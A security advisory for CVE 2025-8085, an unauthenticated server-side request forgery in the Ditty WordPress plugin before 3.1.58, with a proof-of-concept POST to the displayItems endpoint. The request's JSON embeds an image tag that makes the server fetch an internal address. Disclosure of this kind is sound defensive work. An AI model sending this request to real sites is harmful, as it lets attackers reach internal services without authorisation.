Ditty < 3.1.58 – Unauthenticated SSRF | CVE 2025-8085

Description

The plugin lacks authorization and authentication for requests to its displayItems endpoint, allowing unauthenticated visitors to make requests to arbitrary URLs.

PS: v3.1.57 attempted to fix the issue with a nonce check, however any authenticated users, such as subscriber can retrieve it.

Proof of Concept

```
POST /wp-json/dittyeditor/v1/displayItems HTTP/1.1 
Host: site.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0 
Accept: application/json, text/javascript, */*; q=0.01 
Accept-Language: en-US,en;q=0.5 
Accept-Encoding: gzip, deflate, br 
Content-Type: application/json 
X-Requested-With: XMLHttpRequest 
Content-Length: 436 
Connection: keep-alive 
Sec-Fetch-Dest: empty 
Sec-Fetch-Mode: cors 
Sec-Fetch-Site: same-origin 
 
{ 
  "apiData": { 
    "layouts": [ 
      { 
        "id": "ssrf_layout", 
        "html": "{image default_src=\"https://127.0.0.1:9393/poc\"}", 
        "css": "" 
      } 
    ], 
    "items": [ 
      { 
        "item_id": "1", 
        "item_type": "default", 
        "item_value": { "content": "SSRF demo" }, 
        "layout_value": { "default": "ssrf_layout" } 
      } 
    ] 
  } 
}